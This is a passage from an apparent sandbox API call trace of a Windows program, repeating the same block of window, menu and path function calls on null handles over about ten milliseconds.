| out: pszPath=0x0) returned 0 [0027.658] PathFileExistsW (pszPath=0x0) returned 0 [0027.658] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.658] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.658] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.658] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.658] GetMenu (hWnd=0x0) returned 0x0 [0027.658] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x289) returned -1 [0027.658] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.658] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.658] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.658] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.658] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.658] GetStockObject (i=6) returned 0x1b00018 [0027.658] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.658] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.659] PathFileExistsW (pszPath=0x0) returned 0 [0027.659] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.659] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.659] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.659] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.659] GetMenu (hWnd=0x0) returned 0x0 [0027.659] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.659] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.659] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.659] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.659] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.659] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.659] GetStockObject (i=6) returned 0x1b00018 [0027.659] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.659] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.659] PathFileExistsW (pszPath=0x0) returned 0 [0027.659] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.659] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.659] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.659] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.659] GetMenu (hWnd=0x0) returned 0x0 [0027.659] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.659] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.659] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.659] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.659] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.659] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.659] GetStockObject (i=6) returned 0x1b00018 [0027.659] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.659] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.659] PathFileExistsW (pszPath=0x0) returned 0 [0027.659] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.659] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.659] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.660] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.660] GetMenu (hWnd=0x0) returned 0x0 [0027.660] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.660] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.660] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.660] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.660] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.660] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.660] GetStockObject (i=6) returned 0x1b00018 [0027.660] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.660] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.660] PathFileExistsW (pszPath=0x0) returned 0 [0027.660] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.660] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.660] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.660] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.660] GetMenu (hWnd=0x0) returned 0x0 [0027.660] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.660] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.660] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.660] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.660] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.660] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.660] GetStockObject (i=6) returned 0x1b00018 [0027.660] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.660] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.660] PathFileExistsW (pszPath=0x0) returned 0 [0027.660] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.660] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.660] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.660] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.660] GetMenu (hWnd=0x0) returned 0x0 [0027.660] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x36e) returned -1 [0027.661] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.661] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.661] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.661] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.661] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.661] GetStockObject (i=6) returned 0x1b00018 [0027.661] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.661] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.661] PathFileExistsW (pszPath=0x0) returned 0 [0027.661] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.661] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.661] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.661] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.661] GetMenu (hWnd=0x0) returned 0x0 [0027.661] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.661] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.661] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.661] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.661] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.661] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.661] GetStockObject (i=6) returned 0x1b00018 [0027.661] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.661] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.661] PathFileExistsW (pszPath=0x0) returned 0 [0027.661] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.661] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.661] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.661] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.661] GetMenu (hWnd=0x0) returned 0x0 [0027.661] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.661] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.661] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.661] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.662] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.662] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.662] GetStockObject (i=6) returned 0x1b00018 [0027.662] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.662] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.662] PathFileExistsW (pszPath=0x0) returned 0 [0027.662] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.662] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.662] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.662] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.662] GetMenu (hWnd=0x0) returned 0x0 [0027.662] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.662] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.662] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.662] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.662] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.662] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.662] GetStockObject (i=6) returned 0x1b00018 [0027.662] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.662] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.662] PathFileExistsW (pszPath=0x0) returned 0 [0027.662] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.662] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.662] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.662] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.662] GetMenu (hWnd=0x0) returned 0x0 [0027.662] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.662] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.662] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.662] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.662] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.662] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.662] GetStockObject (i=6) returned 0x1b00018 [0027.663] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.663] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.663] PathFileExistsW (pszPath=0x0) returned 0 [0027.663] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.663] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.663] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.663] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.663] GetMenu (hWnd=0x0) returned 0x0 [0027.663] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xe3) returned -1 [0027.663] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.663] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.663] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.663] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.663] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.663] GetStockObject (i=6) returned 0x1b00018 [0027.663] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.663] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.663] PathFileExistsW (pszPath=0x0) returned 0 [0027.663] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.663] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.663] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.663] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.663] GetMenu (hWnd=0x0) returned 0x0 [0027.663] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.663] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.663] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.663] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.663] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.663] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.663] GetStockObject (i=6) returned 0x1b00018 [0027.663] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.663] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.663] PathFileExistsW (pszPath=0x0) returned 0 [0027.663] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.664] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.664] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.664] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.664] GetMenu (hWnd=0x0) returned 0x0 [0027.664] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.664] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.664] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.664] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.664] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.664] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.664] GetStockObject (i=6) returned 0x1b00018 [0027.664] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.664] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.664] PathFileExistsW (pszPath=0x0) returned 0 [0027.664] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.664] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.664] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.664] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.664] GetMenu (hWnd=0x0) returned 0x0 [0027.664] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.664] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.664] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.664] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.664] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.664] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.664] GetStockObject (i=6) returned 0x1b00018 [0027.664] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.664] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.664] PathFileExistsW (pszPath=0x0) returned 0 [0027.664] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.664] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.664] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.664] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.665] GetMenu (hWnd=0x0) returned 0x0 [0027.665] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.665] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.665] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.665] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.665] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.665] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.665] GetStockObject (i=6) returned 0x1b00018 [0027.665] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.665] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.665] PathFileExistsW (pszPath=0x0) returned 0 [0027.665] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.665] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.665] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.665] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.665] GetMenu (hWnd=0x0) returned 0x0 [0027.665] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x47c) returned -1 [0027.665] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.665] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.665] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.665] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.665] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.665] GetStockObject (i=6) returned 0x1b00018 [0027.665] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.665] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.665] PathFileExistsW (pszPath=0x0) returned 0 [0027.665] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.665] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.665] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.665] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.665] GetMenu (hWnd=0x0) returned 0x0 [0027.665] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.666] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.666] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.666] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.666] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.666] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.666] GetStockObject (i=6) returned 0x1b00018 [0027.666] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.666] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.666] PathFileExistsW (pszPath=0x0) returned 0 [0027.666] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.666] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.666] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.666] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.666] GetMenu (hWnd=0x0) returned 0x0 [0027.666] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.666] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.666] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.666] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.666] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.666] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.666] GetStockObject (i=6) returned 0x1b00018 [0027.666] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.666] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.666] PathFileExistsW (pszPath=0x0) returned 0 [0027.666] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.666] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.666] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.666] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.666] GetMenu (hWnd=0x0) returned 0x0 [0027.666] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.666] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.667] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.667] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.667] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.667] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.667] GetStockObject (i=6) returned 0x1b00018 [0027.667] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.667] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.667] PathFileExistsW (pszPath=0x0) returned 0 [0027.667] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.667] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.667] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.667] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.667] GetMenu (hWnd=0x0) returned 0x0 [0027.667] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.667] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.667] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.667] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.667] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.667] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, 